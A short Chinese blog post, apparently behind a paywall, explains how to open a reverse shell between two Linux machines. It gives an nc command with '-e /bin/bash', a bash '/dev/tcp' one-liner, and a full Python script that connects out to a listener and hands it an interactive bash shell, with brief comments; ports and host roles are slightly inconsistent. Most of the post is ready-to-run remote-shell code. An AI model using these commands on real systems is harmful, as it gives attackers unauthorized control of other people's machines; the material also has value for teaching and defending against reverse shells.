本文介绍了如何在两台Linux系统间利用nc命令创建反向shell连接。通过在主机A上运行nc监听命令,然后在主机B上执行nc连接命令附带bash shell,实现A对B的shell访问。当nc命令缺少-e参数时,可以通过编写Python脚本来实现相同功能,绕过一些复杂操作。同时,文章提出可以考虑使用SSH作为替代方案,以更安全地进行远程连接。
nc这个命令屌炸天,经常用作黑客工具。简单说下反向shell
2台Linux电脑
A:192.168.0.21
B:192.168.0.22
A设置nc -lv 8081
B执行nc 192.168.0.21 8080 -e /bin/bash
这样就A就可以链接上B计算机的shell
但是-e这个参数默认时候是木有的,甚者nc命令都木有,可以自己下载源代码编译一个,略麻烦
但是在目标计算机A中必然有bash
bash -i>& /dev/tcp/192.168.100.113/4444 0>&1
但是要自己创建socket文件,麻烦
最后使用Python写脚本
import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.21',8080))
#重定向shell输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
#执行子程序
p=subprocess.call(['/bin/bash','-i'])
A机器
最低0.47元/天 解锁文章
扫一扫
241
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
